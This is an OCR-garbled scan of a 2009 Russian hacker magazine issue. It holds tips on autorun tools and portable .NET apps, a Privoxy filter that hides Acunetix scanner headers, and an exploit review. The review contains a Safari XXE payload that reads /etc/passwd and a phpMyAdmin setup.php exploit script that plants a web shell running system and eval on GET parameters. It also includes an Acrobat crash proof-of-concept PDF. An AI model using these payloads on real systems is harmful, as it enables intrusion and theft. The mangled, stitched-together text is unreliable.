ІТ ОегЫэиЛеп) геігигп ніиьи 

бог О - 0; 1 <- СЬиПеп - Теп); ++1) 

бог ^ ■ О; ] < Теп; ++р 

Е* !- Ы=[1 +■ Ьгеак; 

» Іеп) гмигп (ЬР + 1}: 

геіигп мііі.1.; 



1т таІпИггс агдс. сГіаг* агдѵ[]) 

нАмоиЕ Н; 
сНаг с; 
оодэао гЬ; 

<Иаг* р; 

1 пт х; 

сКаг Ьиб[2й4б]; 
сЬаг ѵо1шіемате[25б]; 
сНаг ттр[25б]; 
сНаг Р$мате[25й] ;; 

мах*! типг матеі_еп д* Ь , Р і Т е5у ешР 1 адз , 5ег і аТ N іш ; 



ргіпіІТ'Апбі Аи*оВип СО 5І.Е5НУГ); 
іб (агдс-»1) // если буква диск на введена 

рг1птб("Ептег огіѵег иатсег : 
с=детсЬ(); // спросим букву диска 

шшшшяш 



Сорецутилы АпЕ Аи^оРІЧЫ 



5 . При обнаружении файла авторана есть два варианта событий: включить 
авторан и отключить авторан. 

Сорецутилыты, как всегда, найдешь на нашем ДВД, дерзай :). 



СЫЕКТ-НЕАБЕК-РІЬТЕК: асипебіх-сопбгоі Кетоѵез Асипебіх 
йеабегз . 

з/^Асипебіх-Ргобисб : \з* . *//і 
з/ А Асипебіх-5саппіпд-адгеетеп1і : \з* . *//і 
з/ А Асипебіх-ІІзег-адгеешепЦ І\з* . *//і 
з/ А Асипебіх-Азресб : \з* . *//і 
з/ А Асипебіх-азресб-раззѵтогб: \з* . *//і 
з/ А Асипебіх-азресб-диегіез : \з *.*/*/-, і 

5 . Активируем созданный фильтр. 

изег . асбіоп 

{+с1іепб-1іеабег-бі11іег {асипебіх-сопбгоі } } 

/ 

6. Запускаем Ргіѵоху. 

Т.Указываем АсипеЕх на необходимость работы через Ргіѵоху. На вкладке 

ЗеШпдз, выбери 6АЫ ЗеШпдз и 
установи настройки НТТР-прокси: 
НозШате — ІосаІЕозЕ Рогі — 81 18. 
Для проверки примени директиву 
ЕеЬид=64 в основном конфигура- 
ционном файле сопЕд.М Ргіѵоху 
или запусти любой сниффер паке- 
тов. Учти, что встречаются и другие 
заголовки, да и пропалиться можно 
совсем по другому поводу, та к что 
будь начеку, хакер! 




ХАКЕР 07 /1 27/ 09 





№6 



ЗАДАЧА: СОЗДАТЬ ПОРТАТИВНУЮ 
ВЕРСИЮ .ЫЕТ-ПРИЛОЖЕНИЯ С 
ИСПОЛЬЗОВАНИЕМ ТНШАРР 



РЕШЕНИЕ: 

Мне приходится пользоваться различными ЖТ-сборками, втом числе и совсем 
безобидными. Да и сам я, разрабатывая дескгопные приложения, зачастую программи- 
рую на С#. Какудобно закинуть все это добро на флеху и пользоваться везде, где только 
можно! Проблема втом, чтофреймворкпоумолчанию в ѴѴіпХР не включается и велика 
вероятность, что запуск проги будетсвязан с необходимостьюустановки самой среды. 
Тем не менее, создать портативное приложение можно, например, с использованием 
виртуального контейнера ТЫ пАРР. 

1. Скачиваем ЖТЕгатеѵѵогк3.5поадресѵ бир://боѵѵп[оаб.тісго5о(Цсот/ 
боѵѵпІ.оаб/2/0/е/20е90413-71 2Ы438с-988е-1 : баа79а8асЗб/боІпеб : х35.ехе .Я 

тебе советую скачать весь пакет — еще пригодится :] 

2 . Скачиваем любую среду виртуализации, например ѴМѴѴагеѴѴогкзІабоп. 

3. Устанавливаем виртуальную ось. Нужна максимально чистая ѴѴіпбоѵѵзХР (всякие 
2ѵег0Ѵ0 не рулят)! 

4 . ОТКАЗЫВАЕМСЯ отустановкиѴМѴѴагеТооІз. Поверьмне, такнадо, хотя вофициаль- 
ной документации про это ничего нет. 

5. Каким-тообразомполучаемиинсталлируемТЫпАРР—тулзастоитот6000вечнозе- 
леныхрублейдакчто разбирайся сам:] 

6. Делаем снапшотсистемы под названием ТЫ пАРРРеабу. 

7 . ЗапускаемТЫпАРРЗеЫрСарЫге, следуем инструкциям мастера. 

Ѳ. Устанавливаем ЖЖатемогк. 

9. Настраиваем опции сборки конте йн ера ТЫ пАРР Обязательно включи в составточек 
входа стб. ехе. В качестве ЗапбЬох босабоп выбирай 115В ЕІазЫ 

1 0. Собираем контейнер. Сохраняем его вукромном месте. И я бы посоветовал еще раз 
снять снапшот. 

1 1 . Запускаем ТЫпАРР 5еЫр Саріиге и устанавливаем/копируем нужное нам прило- 
жение. Если копируешь, лучшеэто делать в папку%ргодгапЫіІе5%, она будетвидна из 
контейнера по переменной окружения и, соответственно, через консольты получишь 



доступ кфайлам в обход интерфейса приложения. 

1 2. Настраиваем параметры сборки контейнера и, незапуская Ьиііб, нажимаем на 
кнопку В гоѵѵзе РгоіесЕ 

1 3. Выбираем для реда жирования файл раскаде.іпі. Устанавливаем в нем параметр 
РедиігебАррЕіпкз=..\боІпеШ<35\боІпеіЬ<35, где .АбоІпеЫхЗб — путь до контейнера, содер- 
жащего ЖТ, а боІпе^хЗб — собственно, имя самого файла контейнера. 

14. Строим контейнер. 

15. Перед запуском приложения удостоверься, что контейнер с. ЖТ-средой доступен 
поуказанному в настройках пути. 

Если тебе неохота засовывать само приложение в отдельный контейнер, можно этого и 
не делать. Надеюсь, ты включил в качестветочки входа в контейнер .МЕТ стб.ехе (если 
нет— кури пун кг 9]. Запусти стб.ехе из папки с контейнером и уже из консоли вызови 
ЖТ-приложение. Могутебя уверить— среду оноувидити запустится нормально! 




Добавляем ссылку на контейнер .ЫЕТ.Ьтр 



№7 



ЗАДАЧА: СОЗДАТЬ ПОРТАТИВНУЮ 
ВЕРСИЮ .ЫЕТ-ПРИЛОЖЕНИЯ С ИС- 
ПОЛЬЗОВАНИЕМ ХЕЫОСООЕ 



РЕШЕНИЕ: 

Конечно, можно сделать все с помощью ТЫпАрр: создать контейнер со 
средой .ЫЕТ и натравить на него каким-либо образом тулзу на дотнете. 
Но... контейнер этоі 50 метров. А что, еслитулза при этом весит каких-ни- 
будь пару мегабайт? Что, тащить за ней весь контейнер со средой? Конеч- 
но, нет! И если вмварез не справляется сзадачей, то на помощь приходит 
Хепособе Розбэиііб! Он проанализирует код (точнее, секцию изіпд] и сам 
определит, какие длл’ки из среды .ЫЕТ нужно класть в контейнер ствоей 
тулзой. Вдобавок он умеет обфусцировать код несколькими методами 
(есть даже специально против ІЕОА5М]. И все это управляется из интер- 
фейса гіЬЬоп (а-ля оЫсе 2007]. Моятулза весом 2 метра превратилась в 
экзешник25 мегабайтѣ использую Хепособе РозШиіІб ѵ7. 0.162]. 

1. Идем на вкладку арріісабоп, добавляем в список свою тулзу. 

2. Идем на вкладку оиЕриІ:, ставим галку сотрііеарріісабоп Іо пабѵе х86 
ехесЫаЫе ітаде. 

3. Выбираем зіпдіе арріісабоп ехесЫаЫе и в комбобоксе выбираем экзеш- 
ник, к которому хепособе добавитсреду .ЫЕТ. Тутже есть галка ОепегаЫ 
біадпозбс-тобе ехесЫаЫе. Если впоследствии тулза будет сыпаться с 
ошибками, можно попробоватьскомпилитьсэтой галкой. Тогда в папку с 
приложением будет падать логе подробным описаниемтого, что проис- 
ходит. 

4 . Идем на вкладку Ѵіііиаііге. В Випбтез можно выбрать версию среды, 
добавляемую в экзешник. Имей в виду, что среду хепособе подгружает из 
интернета со своего сайта, даже если она уже установлена в системе. 

5 . В РіІезузЫт можно добавить все, что должно быть в виртуальной 
файловой системе приложения. Например, моятулза не можетжитьбез 



длл’лек пакета ОеѵЕхргезз, который разрабатывает сторонняя контора 
и которые не входят в состав среды .ЫЕТ. Поэтому в папку АррЕсабоп 
ОігесЫгуя добавил длл’ки из этого пакета. 

Если не требуется обфускация (это тема для отдельного разговора], то на 
этом все. Можно жать Хепособе Арріісабоп, и через несколько десятков 
секунд втвоем распоряжении — портативная версия приложения, не 
требующая среды .ЫЕТ! 

Теперьо неприятном, то естьо минусах. К сожалению, точка входа может 
бытьтолько одна. Если твое приложение состоит из нескольких исполняе- 
мых файлов, то решений тут может быть три. 

• Ксенокодить каждый ехе по очереди. Тогда к каждому исполняемому 
файлу будет добавляться среда .ЫЕТ. 

• Сделатьточкой входа стб. ехе. Туда добавится часть среды .ЫЕТ, необ- 
ходимая для работы твоих приложений (незабудьтолько ихтоже добавить 
в списокна шаге 1 ). Нотогда каждый раз придется открывать заксеноко- 
денную стб. ехе и уже оттуда запускать приложения, чтобы они увидели 
среду .ЫЕТ. 

• Использовать ІЬіпарр. Если у тебя много дотнетовского кода, кото- 
рый нужно сделать портативным, сделай один контейнер со средой 
.ЫЕТ, который будут использовать все приложения. 

Что использовать в каждом 
конкретном случае, решать, 
конечно же, тебе. Ноя бы 
советовал: если есть пара 
приложений, которые неплохо 
бы сделать портативными, 
используй ксенокод. Если же 
тебе нужна вся среда .ЫЕТ 
на флешке, — ТЫпАрр тебе в 
помощь, т 



Собираем сборку в иптападеб коде 
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ЕКЗРЮІТОѴ 



Лето. Пора отпусков. Наверняка, ты подумал, что в это жаркое время 
достойных багов, ровно как и эксплойтов, стало меньше? Черта едва! 
Упорные багоискатели вместо того, чтобы оттягиваться в шумной ком- 
пании, потрошат якобы совершенный софт в поисках смертельных бре- 
шей, а как следствие — и эксплойтов. И, как ни странно, находят! 



МНОЖЕСТВЕННЫЕ УЯЗВИМОСТИ 
В5АРАКІЗ.Х 



» Вгіеб 



Давненько мы не кидали камни в огород МасіпІозЬ’а! Боюсь думать, 
что все представляют Мас05 какабсолютно защищенную систему (по 
крайней мере.такзаявляютпиарщики]. Ачтоони скажутнато, что 
совсем недавно главный браузер от Масіпбозбі под звучным названием 
«Забагі» был просто обстрелян со стороны багокопателей? В нем нашли, 
как минимум, 3 класса различныхуязвимостей, которые мы сейчасже 
рассмотрим подробнее. 

Справедливости ради я сразу внесу важную ремарку: все найденные 
баги напрямую не относятся к «Баба гі» — они таятся в различных библи- 
отеках и средствах разработки, используемых браузером: «РгееТуре», 
«ЫЬРпд», «Арріе’з ѴѴеЬкіІ». С одной стороны, это снимает ответствен- 
ность с разработчиков Мас05-браузера, с другой — «глобализует» баг, 
позволяя ему мигрировать в другие приложения. 

Теперь по существу: одной из первыхуязвимостей, обнаруженной еще 
в конце апреля, является выполнение произвольного кода в удаленной 
системе. Со слов независимых экспертов, достаточно под благо- 
видным предлогом передать жертве ядовитый л инк, в котором будет 
присутствовать ссылка на модифицированный шрифт. Скушав красную 
пилюлю, система впадет в ступор и выполнит произвольный код, либо 
уронит МасОЗ (в смысле, не со стола, конечно :], просто устроитлокаль- 
ный БоЗ]. 

Недостаточные проверки параметров, приводящие к переполнению 
буфера, присутствуют в библиотеке «РгееТуре», а именно, в штатных 
функциях обработки шрифтов «сіб_сЬаг5е1:_сопприІе_сісІ5(]» и «і?_ 
зтооіЬ_гепсІег_депегіс(]». Нам же остается поверить багоискателям на 
слово, ибо эксплойт пока еще крутится в приватных хакерских кругах (по 
слухам, вполне достойно функционирует]. 

Второй баг, обнаруженный чуть позже, хранится в функциях обработки 
РЫО-изображений библиотеки «ІіЬрпд». Уязвимость существует из-за 
того, что библиотека некорректно инициализирует определенные мас- 
сивы указателей перед освобождением элементов массивов в случае, 
когда приложение потребляет всю доступную память. Злоумышленник 



может заслать ссылку на специальный РЫО, который позаботится о пов- 
реждении памяти и выполнитпроизвольный код на удаленной системе. 
Но, опять-таки, это все слова — эксплойту временно присвоен статус 
«Осіау». 

И, наконец, третья уязвимость затесалась в продукт «Арріе’з 
ѴѴеЬкіІ», посредством которого написано множество яблочных 
продуктов. Баг присутствует в функциях обработки ХМІ_ и отно- 
сится к классу уязвимостей XX Е (ХМ Б еХіегпаІ Епііііу — Внешний 
объектХМБ]. Разработчики случайно (или намерено] допустили 
возможность включения произвольного локального файла в 
просматриваемый ХМ Б- до куме нт. Последствия от бреши могут 
быть самыми разными: от банального БоЗ’а системы (когда 
пользователь обратится к какому-нибудь «/беѵ/игапсіопп» или 
аналогичному ѴѴіп- приложению], до создания специальной 
клиент-серверной системы (когда содержание файла неминуемо 
попадет на компьютер злоумышленника]. Не исключен вариант, 
когда « 5а ба гі » запущен под привилегированным пользователем 
(в этом случае атака будет носить локальный характер с целью 
повышения прав]. 



»ТагдеІ5| 



Уязвимы все версии Заба гі до 4.x, включая іРЬопе, где установлен сей 
зверек. Крометого, из-за глобальности бага, он может присутствовать во 
всех продуктах, основанных на «Арріе’з ѴѴеЬКіІ». Они не особо популяр- 
ны, но списокты всегда можешь найти на ѵѵеЬкіБога . 



» ЕхрІоіі| 



Ниже привожу код эксплойта для реализации бага в «Арріе’з ѴѴеЬкіІ;» в 
родном «Забагі». 

< ! БОСТУРЕ йос [ < ! ЕЫТІТУ епС ЗУЗТЕМ " Щ.е ; /‘/ /еДс/ 
раззѵ\гсІ"> ] > 

<хз1 : зСуІезЬееС ѵегзіоп= "1.0" 

хшіпз : хз1= "БШСр : / /ѵіѵт.ѵі 3 . огд/1999/ХЗЬ/Тгапз1огт" > 
<хз1 : СетрІаСе таСс]т= " / " > 

<БЩт1> 

<Ъос1у> 
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ХАКЕР 07 /127/ 09 






взлом 



і\ 

і эксплоитов 



ОБЭОр 

эксплоитов 



ОБЭОр 

эксплоитов 



» 



Веіоѵѵуои зЬоиШ зее Ібе сопіепі оіа Іоса I Л Іе, зіоіеп Ьуібіз еѵіІѵѵеЬ раде. 



<р/> 

&е пС ; 

<зсгірр> 

аІегС (сІоситепС .Ьосіу . іппегНТМЬ) ; 

</зсгірк> 

< /Ьосіу > 

</хз 1 : кетр 1 аке> 

</хз 1 : зЬу 1 езЬееЦ> 

Как видишь, лексема «&епІ;» хранит в себе содержимое «Мс/раззѵѵб», 
который магическим образом отобразится на экране. Если ты счастливый 
обладатель 5аба гі , можешь пройти тест на вшивость по ссылкам Ь 
сеѵапз-арр.аррзроІ.сот/зІаІіс/заІагізІеаШІеЬид.хппіЛ МасОЗ] и ЬНрз:// 
сеѵапз-арр.аррзроЕсот/зІабс/заІ'агізІеаІбІеЬиаѵѵіп.хппІ (ѴѴіпбоѵѵз). 



»5оилюм 



Обновление до Заіагі 4.x решитвсе проблемы и устранитугрозы внеш- 
них нападений. 




РНРМѴАОМШ (/5СРІРТ5/5ЕТІІР.РНР) 
РНР СОРЕ ІШЕСТІОЫ ЕХРЮІТ 



» Вгіе{ 



Давно нас не баловали хорошими уязвимостями в популярных проектах. 
Сегодня я постараюсь это исправить: 4 июня ба гоискателям удалось обна- 
ружить изъян в проекте рбрМуАбтіп, а именно — в генераторе настроеч- 
ных файлов «/зсгіріз/зеіир.рбр». Суть бага довольно проста: в процессе ус- 
тановки рбрМуАбтіп происходит генерация основных параметров (хоста 
тузці, логина, пароля, названия базы ит.п.) с последующим ихсохранени- 
ем в «/сопбд/сопбд.іпс.рбр». Так вот, до недавнего времени разработчики 
довольно аккуратно фильтровали нежелательный контент, но в последних 
версиях чуть-чуть изменили алгоритм. В итоге, злоумышленник может 
передать ядовитые параметры, позволяющие записать произвольный код 
в конфигурационный файл. Затем, по обращению к этому конфигу, хакер 
получит полноценный ѴѴеЬ-шелл. Атеперь разберемся, какэто происходит 
насамомделе. Вместеспрочими параметрами взначение переменной 
«Ьозі» инжектируется, к примеру, фраза «рЬріпбоО ;//1оса1Ьоз1:». На выходе 
получим вполне работоспособный сценарий, выводящий рбріпІоО. 

Помимо прочего, эксплойт позволяет внедрить«разз1;Ьги(]» для передачи 
команд ѴѴеЬ-шеллу при помощи значения переменной «с». 

Но не думай, что всетак просто. Эксплойт накладывает некоторые 
ограничения на рбрМуАбтіп. Во-первых, нужно, чтобы админист- 
ратор устанавливал проект через мастера, а не вручную. Во-вторых, 
необходимо наличие файла «зсгі різ/зеііи р. рЬ р», который почему-то 



(интересно, почему? :)) любятудалять. В-третьих, директория «сопбд/» 
также должна присутствовать, а на файл «сопбд.іпс.рбр» должен 
быть установлен атрибутзаписи. В-четвертых, на машине необходим 
работоспособный си гі (с его помощью происходит инжектирование 
кода]. И, наконец, уязвимыми версиями рбрМуАбтіп являются 2.1 1.x 
до 2.1 1 .9.5 и 3.x до 3.1 .3.1 (все релизы достаточно новые и выпускались 
до апреля этого года]. 

Как итог, хакер можетбез труда написатьавтосканер рбрМуабтіп и 
эксплуатировать каждый хост. На мой взгляд, вероятность успехи атаки 
недалека от30%, а при таких раскладах одна лишь ночь сканирования 
будет приносить взломщику море нелишних ѴѴеЬ-шелл ов. 



» ЕхрІоіі| 



Ниже приводится ключевая функция ехрІоіШ, отвечающая за инжект 
вредоносного кода. 

ІипсСіоп ехріоік { 

розСс 1 аЦа= " Цокеп=$ 1 &асЦіоп=заѵе&сопПідигаСіоп= " \ 

" а : 1 : { з : 7 : % 22 Зегѵегз% 22 %ЗЬа : 1 : {і: 0 %ЗЬа: 6 : {з: 23 : % 22 Ьоз 
к % 2 7 ] = " \ 

"% 27 % 27 %ЗЪ% 20 рЬріпко% 28 % 29 %ЗЪ//% 22 %ЗЪз: 9 : % 221 оса 1 Ьозк 
% 22 %ЗЬз : 9 : " \ 

" % 22 ехкепзіоп% 22 %ЗЪз : б : % 22 тузд 1 і% 22 %ЗЪз : 12 : % 22 соппес 
Ц_Суре% 22 %ЗЬз : 3 : " \ 

" % 22 кср% 22 %ЗЪз : 8 : % 22 сотргезз% 22 %ЗЬЬ : 0 %ЗЬз : 9 : % 22 аик 
1 з_куре% 22 %ЗЬз : б : " \ 

" % 22 сопПід% 22 %ЗЬз : 4 : % 22 изег% 22 %ЗЬз : 4 : % 22 гоок% 22 %ЗЪ} } }& 
ео 1 куре=ипіх" 

розксіака 2 = " Рокеп=$ 1 &асСіоп=заѵе&сопПідига 1 ііоп=а : 1 : " \ 

" {з : 7 : % 228 егѵегз% 22 %ЗЬа : 1 : {і: 0 %ЗЬа: 6 : (з: 136 : % 22 Ьозк %2 
7 % 5 сЭ= "\ 

" % 27 % 27 %ЗЬ% 2 ОіП ( \$_СЕТ% 5 Ь% 27 с% 27 % 5 сі) {есЬо %20 
% 27 %Зсрге%Зе% 27 %ЗЬ" \ 

" зузкеш ( \$_СЕТ% 5 Ь% 27 с% 27 % 5 сі) %ЗЪесЬо% 2 0 % 27 % 3 с/ 
рге%Зе% 27 %ЗЬ} "\ 

"ік (\$_СЕТ% 5 Ь% 27 р% 27 % 5 сі) {есЬо %20 
% 27 %Зсрге%Зе% 27 %ЗЬеѵа 1 " \ 

" ( \$_СЕТ% 5 Ь% 27 р% 27 % 5 сі) %ЗЪесЬо% 2 0 % 2 7 % 3 с/ 
рге%Зе% 27 %ЗЬ) %ЗЬ// " \ 

" % 22 %ЗЬз : 9 : % 22 1 оса 1 Ьозк% 22 %ЗЪз : 9 : % 22 ехкепзіоп% 22 %ЗЬз : 

6 : % 2 2 " \ 

"тузд 1 і% 22 %ЗЬз : 12 : % 22 соппеск_куре% 22 %ЗЬз : 3 : % 22 кср% 22 % 
ЗЬз : 8 : "\ 

" % 22 сотргезз% 22 %ЗЬЬ: 0 %ЗЬз : 9 : % 22 аи кЬ_ 
куре% 22 %ЗЬз : 6 : % 22 сопкід" \ 

" % 22 %ЗЬз : 4 : % 22 изег% 22 %ЗЬз : 4 : % 22 гоок% 22 %ЗЬ} } }&ео 1 куре= 
ипіх" 



НАГЛЯДНАЯ ДЕМОНСТРАЦИЯ УЯЗВИМОСТИ ПОД ѴѴІЫ00ѴѴ5 



ПОСЛЕ ДРАКИ КУЛАКАМИ НЕ МАШУТ :) 




Арріе ■ АЬнзиІ іимгі іу «опіапі оС Зиічгі 4,0 



іго8 сііеск аІІ 
«г сіоѵѵпіоагіз 
№ 3 апіі-ѵігиз 
епдіпе&! 



* 



05 |ипо, ЗООа 

ІлзІ МогііЛмІ : Іипе 0В Р 2009 
ДгВДг; НТЭ&1Э 

Бит тагу 

ТГісе гіаеипипі гіжсЛЬѳа СЬе зееигііу еяЫэміСоГ 5аТаг1 4,0. 



Рог іНе ргаЪесНоп о( еиг сиЛзотвге, Арріе сіоеі поС гігикгее, гііісиы. вг еяіЙгт мсигКу 
Іта« ѵпЫ в ГиІІ ІпмчяЦдй'Ыоіп Ніве «пгтай опсі вяу г>гсѵг»гу рэІсНн ог пгіммг л те 
а ѵа ііа ЬІа. То Іаат топа аЬоиЕ Арріс РлогіиД 5ыиПЕу , же Дрріе Рпмі иеі ЗвялІІу 
еічЪсІкя. 



Гог іп^огтэ&оп вЬои! (Ье Арр8е Ргиіікі ЗясигіЬу РбР Ко у, ем 'Ноге (о ин Иле Аррів Ртйис 
ЬкигКу РСР ХаЩ 

Ѵ/Н-еге роозіЫе, СѴЕ ІСН ага «неё Іе гайвгалса Ніе ѵиГпагаЫІШіы Іег (иПЬйг ІпЛагтпаНоп. 

Те Гаат аЬеыІ «Квг іесчпіѵ ирйаіеі. ьее 'ДррТа 5всиг№у ирОаЕж.* 



РгегіиеЫ ДЯкІгі 

ЙоРап . Ргсгіис? ЗмигІІу,. ЙаГвгі * 

БоГаН 4.0 

спмімн-к 

СѴЕ-Ш: СУЕ- 20 ад -1704 
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эксплоитов 




ОБЗОр 

эксплоитов 



ОБЗОр 

эксплоитов 



!\ !\ |\ 

Іоіа 0 сЬяосІ 4-х ех.аЬ 

Іоіа 0 ./ех.аЬ Ьсър://ѵѵѵ.пасагсЬ.Ьи/агсМѵпес/рЬр»уа<1ші.п/ 

[4] сЬескіпд К рЪрНуАсігаіп ехізса оп ЧРЬ ргоѵійесі ... 

[+] рЬрИуАсЬпіп НОТ Соипй! рЬрНуАсЬпіп Ьазе ЧМ. іпеоггесЧу сурей? ѵгопд сазе-зепзіе Іѵіьу? 
Іоіа 0 ./ех.аЬ Ьсср://*ѵѵ.пасессЬ.Ьи/агсЫѵпес/рЬрп>уа«1шіп 
1+] сЬескіпд 1* рЬрНуАгігаіп ехізсз оп ЧМ. ргоѵіОеО ... 

(+] рЬрНуАсЬпіп НОТ іоипй' рЬрКуАйвіп Ьаае ЧМ. іпсоггессіу суреО? ѵгопд свае-вепзічѵісу? 
Іоіа IV яЬ ех.аЬ 

из аде: ,/ех.яЬ <рЬрНуАй»іп_Ъазе_ЧМ.> 

І.а.: ./ех.аЬ Ьсср://сагдес.с1<1/рЬрИуЛ<іиріп/ 

Іоіа 0 ./ех.аЬ Ьес.р://»ѵѵ. пасагсЬ. Ьи/агсЫѵпес/рЬргау&сІіаіп/ 

(4) сЬескіпд 1< рЬрИуАйтІп ехізсз оп ЧМ. ргоѵЮеО . . . 

[4] рЬрНуАсЬпіп НОТ <ош>4! рЬрНуАеЬпіп Ьазе ЧМ. Іпсогсесііу суресі? ѵгопд сазе-зепзіе іѵісу? 
Іоіа 0 ./ех.аЬ Ьсср://ѵѵѵ. пооаІега.огд/рЬрИуАйтіп/ 

(4] сЬескіпд К рЬрИуАйтІп ехізсз оп ЧМ. ргоѵШесі ... 

(4] соиій по с дгаЬ Гост сокеп. уои кідЬс ѵапс со ссу ехріоісіпд сЬе ѵиіп папиаііу :( 

Іоіа 0 




ОШИБКАТУПАЯДОБОЛИ 



СЕГОДНЯ НЕ НАШ ДЕНЬ. ПРИДЕТСЯ ПИСАТЬ АВТОСКАНЕР... 



к1ад= " /ктр/$ (Ъазепате $0) . $ШШБОМ.р]іріп^о . Над . ккті " 
есЪо " [ + ] аккетркіпд ко іпбеск ркріпко ( ) ..." 
сигі -кз -Ь $2 — сЗ. " $розкс!ака" --игі " $3 /зсгіркз/зекир . 
ркр" >/(Зеѵ/пи11 

ік сигі -кз --игі " $3 /сопкід/сопкід . іпс .ркр" I дгер 
"ркріпко ( ) " >/сіеѵ/пи11 
ккеп 

сигі -кз --игі " $3 /сопкід/сопкід . іпс .ркр" >$к1ад 
ескю " [ + ] зиссезз! ркріпко ( ) іпб ескесі зиссеззкиііу ! 
оикрик заѵесі оп $кіад" 

сигі -кз -Ь $2 — (1 $розкс!ака2 --игі " $3 /зсгіркз/ 
зекир.ркр» >/<іеѵ/пи11 

есію " [ + ] уои *зЬ.оиіс1* пом Ье аЫе ко гетокеіу гип 
зкеіі соттапсіз апсі РНР сосіе изіпд уоиг Ъгомзег. і . е . : " 
ескю " $3/сопкід/сопкід . іпс .ркр?с=1з+-1+/ " 
ескю " $3 /сопкід/сопкід . іпс . рЬр?р=р1іріпко ( ) ; " 

ескю " ріеазе зепсЗ апу кеесІЪаск/ітргоѵетепкз ког 
кЪйз зсгірк ко"\ 

"ипкпоѵт . репкезкег<АТ_зідп кеге>дшаі1 . сот" 

еізе 

ескю " [ + ] по Іиск іпбескіпд ко $3 /сопкід/сопкід . іпс . 
ркр : ( " 
ехік 
кі 

} 

Если ты не поленишься написать простенький РНР-парсер передавае- 
мых строк, то получишь посимвольную картину и нжекта. 

Полный код эксплойта можно скачать по ссылке зесигіМаЬ.ги/рос/ 
ех(га/381413.рбр . 



»ТагдеІ5; 



Уязвимыми версиями рЬрМуАбтіп являются 2.1 1 .х до 2.1 1 .9.5 и 3.x до 
3.1 .3.1 (все релизы достаточно новые и выпускались до апреля этого 
года]. 



исходит — вываливается среда, из которой был запущен РоС. Если это 
браузер — закрываются все вкладки I Е/Рігеіох/0 рега/Мо^іІІа. Если это 
сам АсгоЬаІ Веабег — то и он вылетает. Короче говоря, сплойт действи- 
тельно сшибаете ногАбоЬе Веабег. 

Почемуже так происходит? Чтобы это выяснить, бережно скачаем РОЕ’ку 
каким-нибудь сторонним менеджером (я использовал ѵѵдеі наудален- 
ном сервере] и присмотримся к исходному коду файла. Для простоты 
восприятия, помещаю его ниже. 

%РБР-1 . 4 
% 

4 0 оЬб«/РгосЗек [ /РБР/Техк] >>епс1оЬб 

5 0 окдсс/Ьепдкк 1»зкгеаш 
епсізкгеат 

епсіокд 

3 0 окдсс/Туре/Раде/Рагепк 2 0 К/Сопкепкз 5 0 К/МесііаВох 
[0 0 595 842 ] /Кезошгсез 4 0 К»епс1оЪб 
2 0 оЬз«/Туре/Радез/Кісіз [3 0 К ] /Соипк 1 »ешЗоЪз 

НЕМЕДЛЕННОЕОБНОВЛЕНИЕ 

щрес; псср : /^дес . ааоое . сот/геааег/ 

Ѵоиг ассоигі ^ Сопіасі Ііпііесі 51 а 1 е$ (СИапде) 

$оііі(іоіі$ Ріо(іііс1$ $(і|)|)оіі Соттипі(іе$ Сотргту ОолиІо<иІ$ $!оіе 



Ноте / Ооѵѵпіоасіз / АсіоЬе Реасіег / 

АсІоЬе Реабег 



М 



ОоѵѵпІоасІ ІІіе ІаІе$( ѵегзіоп оі АсІоЬе Реасіег 

Дііоііе Ре.ніеі 9.1 35.7 ИВ 

(іпсіікіез АсгоЬаиот оп А(ІоЬе АІР) 

ѴѴііиіо\ѵ$ ХР $Р2 • $РЗ, ЕпдІі$Ь 

ОіКегепІ Іапдиаде ог орегаііпд зузіет? 

Ьеат тоге | Зузіет Редиігетепіз | Ысепзе | РізІгіЬиІе АсІоЬе Реасіег 




»5оІи1іоп 



Нависшую угрозу безопасности решитлибоудаление файла «/зегіріз/ 
зекир.рЬр», либо изолирование каталога «/соп(ід» вне ѴѴеЬ-директории, 
либо (самый предпочтительный вариант] обновление рбрМуАбтіп до 
свежей версии. Последнее можно осуществить с официальной локации: 

зоигсеІогде.пеДргоіесІв/рбртѵабппіп . 




АйОВЕ АСРОВАТ 9.1.1 5 ТАСК ОѴЕВРЮѴѴ 
СВАЗИ РОС ЕХРІ.ОІТ 



АІ$о іпзМІІ: 

0 Ргее Ооодіе ТооІЬаг (орііопаі) 1.8 МВ 

о** • о ' < * 

г — Екі 

СОО^ ( > й Вооктяы* ^ 12№х*е<3 

ЗеагсЬ Зоодіе (гот апу ѵѵеЬ раде, Ыоск рор-ирз 
Іѳат тоге | Ргіѵасу роіісу | Ысепзе 



» ВгіеЯ 



Очередная темная лошадка на арене РоС появилась в начале июня. 

На этот раз, позаявлениям неизвестных багоискателей, обнаружилась 
брешь в АсІоЬе АсгоЬаіаждо версии 9.1 .1 . В пабл и к выложили лишь 
РоС-эксплойт, при запуске которого ничего не происходит. Точнее, про- 




Тоіаі : 37.5 МВ 
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О тн р ь\ тис «а Йо 1>о - геа бе г - й о$ , р б і » 



5е 



бы со&фйетесь открыть файл 

айоЬе-геайег-йаз.рйіГ 

я&пяющнйся АйоЬе АогоЬаі Овсигоег* 
и5 ІѴЩ):Яиѵт.жиг№уІаЬ.ги 

Как НгеіРох следует обработать этот файл? 

©і Озууыт ь с но нады ^ | АйоЫ? йдайвг ЭЛ {пзутмячвн.., ^ | 

0 Сохранить файл 

О Выполнять автоматически для всех файлов данного типе- 




ОК 



Отмена 
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АсгоЬаі <= 9 . 1,1 Зіаск ОѵегЛоѵѵ Сгазіі РоС (озх/ѵѵіп) 



01 июня, 2009 



19 Июня 

переполнение буфера при 
обработке ПЕГ изображений а 
ІпТгаѴІем 



Цель: АсІоЬе АсгоЬаІ 9,1.1 и более ранние версии 
Воздействие: Отказ в обслуживании 



0о$ атака в $есиге Саіешау 
зегѵісе в Сіігіх Зесиге Саіеѵѵау 



Множественные уязвимости в 
Арріе іРНопе іі Арріе іРоС ТоисИ 



игсі- адреса: 

• гар:/лѵ**.$есигі!уі ас ш/_сіошііоасі/ехріоі[з/200 9/0 5/эйоое- геаоег-аоз ,рог 

Надежные ПК для бизнеса 

НР Сотрад еЬс750О на базе Іпіеі® Соге™2 Оио с ѴѴіпсіоѵѵв Ѵівіа® Визіпеез 



НА ВОЛОСКЕ ОТ СМЕРТИ... 



6 0 оЪ:і«/8/ ЦаѵаЗсгірС/ Ц8 ( 0 

ТипсСіоп ІпіС\(\) { іі: \ (ДуреоТ СМз . іпіо .МосШаСе == 

" оЬд есС " \ ) { геСигп Сгие ; } арр . аІегС \ ([[[[[[[[... . * 
4098 } ІпіС\(\); ) »еп<1оЬ0 

1 0 оЬз«/Туре/Са1:а1од/Радез 2 0 К/ОрепАсСіоп б 0 
К»епс1оЪз 
хгеі 
0 7 

0000000000 65535 1 
0000020392 00000 п 
